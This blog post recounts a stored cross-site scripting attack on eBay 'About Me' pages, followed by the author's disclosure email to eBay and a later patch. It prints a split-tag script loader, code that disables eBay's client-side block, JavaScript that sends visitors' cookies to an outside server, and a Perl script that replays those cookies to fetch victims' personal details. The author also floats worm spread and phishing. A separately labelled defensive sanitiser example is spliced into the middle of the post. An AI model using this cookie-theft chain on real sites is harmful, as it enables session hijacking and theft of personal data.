Sometimes, when someone bugs you, you'd like to see how to bypass
the bugging. I am not alone in this; take, for example,
BugMeNot.
A few days ago, I had to figure out a way to put the right information on
an eBay About Me page concerning
an eBay store.
The easiest would be to redirect the user to the official website, yet
eBay doesn't allow that kind of JavaScript to be put on there. A link
could be put up, but that wouldn't be nice, for you'd force the user to
click on it before showing the real content. Blocking the JavaScript
I "needed" was promising. How to bypass that? Soon I found out, but then
I figured more was probably possible.
Time to refresh my knowledge
and try a few things. An easy hack was to use this piece of code:
<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://yourserver.com/evilness.js"></SCRIPT>
Now we could do a little more, the easy way. Including a JavaScript file
would speed up the whole debugging of the site. Too bad a lot of stuff would
still be blocked, but that blocking was done by JavaScript itself!
Time to disable the block. So in my evilness.js I would start with:
ebay.oDocument._getControl("blockActiveContent").aBlocks = Array();
Now the list of blocked active content would be an empty array,
meaning we can insert anything we like: iframes,
document.cookie and everything. Yay!
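Both tricks above come down to the same thing: the `<SCRI` + `PT SRC=...` payload is harmless to a filter that looks at the stored HTML once but is reassembled by the browser's parser, and the client-side block is disabled by the very script it should have stopped. As an added example (not code from the post or from eBay; the allowed tags and attributes and the blacklist pattern are assumptions), this contrasts a pattern blacklist with an allow-list re-serialiser that never emits a `<` it did not write itself, the kind of check that belongs on the server before the page is stored:

```javascript
// Added example, not code from the post or from eBay. The allowed tag/attribute
// sets and the blacklist pattern are assumptions made for illustration.
const ALLOWED = { b: [], i: [], p: [], br: [], a: ['href'], img: ['src', 'alt'] };
const allowed = n => Object.prototype.hasOwnProperty.call(ALLOWED, n);

function escapeText(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;')
          .replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}
// Accept http(s) or scheme-less (relative) URLs; javascript:, data:, ... are rejected.
function safeUrl(v) {
  const t = v.replace(/[\s\x00-\x1f]/g, '').toLowerCase();
  return /^https?:\/\//.test(t) || !/^[a-z][a-z0-9+.-]*:/.test(t);
}
// Blacklist: strip external <script src=...> tags from the submitted HTML.
// It sees no such tag in the split payload, so the payload passes untouched.
function blacklistFilter(html) {
  return html.replace(/<script\b[^>]*\bsrc\s*=[^>]*>/gi, '');
}
// Allow-list: tokenise into tags and text, keep known tags and attributes only,
// escape everything else so the browser's parser has nothing to reassemble.
function allowlistSanitize(html) {
  const tagRe = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)([^>]*)>/g;
  const attrRe = /([a-zA-Z][a-zA-Z0-9-]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  let out = '', last = 0, m;
  while ((m = tagRe.exec(html)) !== null) {
    out += escapeText(html.slice(last, m.index));
    last = tagRe.lastIndex;
    const name = m[2].toLowerCase();
    if (!allowed(name)) continue;                  // unknown tag: dropped
    if (m[1]) { out += `</${name}>`; continue; }
    let attrs = '', a;
    while ((a = attrRe.exec(m[3])) !== null) {
      const key = a[1].toLowerCase(), val = a[2] ?? a[3] ?? a[4] ?? '';
      if (!ALLOWED[name].includes(key)) continue;  // onerror, style, ...: dropped
      if ((key === 'href' || key === 'src') && !safeUrl(val)) continue;
      attrs += ` ${key}="${escapeText(val)}"`;
    }
    out += `<${name}${attrs}>`;
  }
  return out + escapeText(html.slice(last));
}
// True when every '<' in html opens or closes an allow-listed tag.
function onlyAllowedTags(html) {
  return [...html.matchAll(/<\/?([a-zA-Z0-9]*)/g)].every(x => allowed(x[1].toLowerCase()));
}
// The split payload from the post, as a constructed test input.
const SPLIT_PAYLOAD = '<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://yourserver.com/evilness.js"></SCRIPT>';
```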
So, why not grab the user's cookies and put that in a form?
document.write('<form action="http://yourserver.com/ebay.evilness.pl" ');
document.write('id="f" method="post">');
document.write('<input type="hidden" name="q" value="" id="q" />');
document.write('</form>');
document.getElementById('q').value = document.cookie;
document.getElementById('f').submit();
Sweet, now the user will be submitting a form with his cookie contents
to us. Let's see if we can use that information! (Of course we can,
otherwise I wouldn't be blogging this ;-)
#!/usr/bin/perl
use strict;
use CGI qw/:standard/;
use LWP::Simple qw/$ua get/;
my $q = new CGI;
$ua->default_headers->push_header('Cookie' => $q->param('q'));
my $personal_info = get('http://my.ebay.com/ws/eBayISAPI.dll?'.
'MyeBay&CurrentPage=MyeBayPersonalInfo');
That's basically all it takes to retrieve the personal page of the user
who just fell into our trap. Using his cookies, we'll be served with all his
information (email address, street address, username etc.). Of course we could
make this into a worm by putting the little JavaScript form into the victim's
About Me page too.
I don't really care about all of this information, and for "the
good stuff" such as passwords and credit card info you'd still need
the password of the user, but hey, we already have his full address
(usually with full name), his email address and username, so a phishing
site is set up in seconds!
... I wonder how many people use the same password on eBay and PayPal ...
Note: all of this is created just for the fun of bypassing roadblocks,
and I expect eBay to terminate your account immediately after finding stuff
like this in your profile, so I do not advise you to use
such tactics! Another thing is that your "victim" has to be
logged in for this, but a lot of them will be.
Of course, I have contacted eBay on this exploit and wrote them the
following:
Dear sirs,
Recently I noticed I was able to use JavaScript on my 'About Me' page, using
an XSS tactic. This way, I was able to pass on cookies to a third party
server (mine in this matter) and use those cookies from there to
access information about the user account.
I have tested this setup as I describe here:
http://url and it does work flawlessly. I could gather username,
address, email info from my own account as well as some friends'
accounts (with their cooperation and permission). I also think
I'd be able to make a worm out of this, infecting every visitor's
'About Me' page.
The solution, IMHO, is quite easy. Stop allowing JavaScript in the About
Me page and actually filter it out before you store it in the databases.
I would like to hear from you regarding this privacy matter and will not
post this blog entry (see URL above) as of yet, to prevent script kiddies
from abusing it. I will post it on Monday, leaving you with enough time
to contact me.
If you do need more time for patching the system, I'm willing to wait
even longer before posting the info on my blog.
Kind Regards,
How nice of me. But unfortunately, I haven't heard from eBay so far, except
for scanning my system from a few different IP addresses. Now, according to
eBay time it's Monday now, so let's unleash this information!
I really thought eBay would care enough about your privacy, yet they don't
even have the decency to email me ...
Update: After
publication on WebWereld, eBay finally deemed it necessary
to email me. They claim never to have received my initial email. Weird,
because my website logs show me that at least 4 different IP addresses
have requested the "secret" URL I created for them. So I guess at least
four people didn't receive my email ...
This hole is patched for now, yet a simple alert('Hello World')
can still be posted, so JavaScript has not been disabled fully.